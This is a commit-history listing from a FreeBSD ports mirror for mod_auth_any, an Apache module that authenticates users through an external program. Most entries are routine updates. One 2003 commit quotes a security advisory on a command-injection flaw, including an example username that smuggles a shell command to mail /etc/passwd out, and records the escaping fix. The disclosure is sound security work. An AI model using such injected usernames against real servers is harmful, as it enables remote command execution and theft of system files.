1
0
mirror of https://git.FreeBSD.org/ports.git synced 2024-11-27 00:57:50 +00:00
Commit Graph

16 Commits

Author SHA1 Message Date
Clement Laforet
f1ed3c8d88 - Convert to new USE_APACHE
- Add SHA256
2005-12-04 16:16:17 +00:00
Clement Laforet
05684b80dd - prepare removal of www/apache2 in favor of www/apache20 for naming
consistency
- add entries in UPDATING (for apache22 too)

PR:		ports/78119
Repocopied by:	marcus
2005-12-04 00:18:15 +00:00
Clement Laforet
a7908f2c29 - Update to 1.5 2004-10-18 19:22:28 +00:00
Clement Laforet
3a8f07a415 - Assign maintainership to freshly created apache@ mailing list 2004-08-18 16:21:55 +00:00
Clement Laforet
b9fadce313 - Update to 1.4
Now mod_auth_any works with apache2!
2004-08-08 09:35:18 +00:00
Clement Laforet
9b3d51b788 - Utilize Makefile.modules.3rd 2004-04-16 13:38:17 +00:00
Clement Laforet
3b8591d72d - SIZEify distinfo 2004-02-07 17:16:21 +00:00
Clement Laforet
3887814e09 - Update my email address
Approved and reviewed by:    erwin (mentor)
2004-01-13 15:04:51 +00:00
Joe Marcus Clarke
f4d7c801f8 Use the new Apache bits from bsd.port.mk.
Submitted by:	dinoex
2003-11-07 09:12:58 +00:00
Edwin Groothuis
44297d052f [update orphand port] www/mod_auth_any: Update to 1.3.2 and take maintainership
- update to 1.3.2
	- update WWW
	- take maintainership

PR:		ports/57413
Submitted by:	Clement Laforet <sheepkiller@cultdeadsheep.org>
2003-10-06 13:00:08 +00:00
Mario Sergio Fujikawa Ferreira
0025bdf0b2 o Fix vulnerability that allows execution of arbitrary commands on
the server with the uid of the apache process. Background [1]:

"The module accepts a username and password from the web client,
passes them to a user-space executable (using popen(3), which invokes
a shell) and waits for a response in order to authenticate the user.
The password is quoted on the popen() command line to avoid
interpretation of shell special chars, but the username is not.
Thus a malicious user can execute commands by supplying an appropriately
crafted username. (e.g. "foo&mail me@my.home</etc/passwd")

"The problem is easily fixed by adding quotes (and escaping any
quotes already present) to the username and password in the popen
command line."

o Fix this by adding a escaping function from [2]. Then, modifying
  this function appropriately with ideas from [3]. Apply the new
  escaping code to mod_auth_any.
o Bump PORTREVISION

Submitted by:	Security Officer (nectar),
		Red Hat Security Response Team <security@redhat.com> [1]
Obtained from:	mod_auth_any CVS [2],
		nalin@redhat.com [3]
2003-03-25 04:23:11 +00:00
Akinori MUSHA
cb07270bfe De-pkg-comment. 2003-02-20 19:21:36 +00:00
Mario Sergio Fujikawa Ferreira
f0a1969d34 o Rollback PORTCOMMENT modifications while this feature's implementation
is better studied
o Turn PORTCOMMENT variable in Makefile back into pkg-comment files

Approved by:	kris (portmgr hat),
		portmgr, re (silence)
2002-11-10 16:48:51 +00:00
Adam Weinberger
d9611f9375 Use PORTCOMMENT in the Makefile, and whack the pkg-comment.
Approved by:	pat
2002-11-06 22:47:41 +00:00
Dirk Meyer
e9bd637dd0 support appache13-modssl by defining APACHE_PORT in /etc/make.conf
others variants of the apache ports can be used too.
2002-09-09 18:30:10 +00:00
Will Andrews
6275296776 Add mod_auth_any 1.0.2, an apache module to use any command line
program to authenticate a user.
2001-04-10 22:28:40 +00:00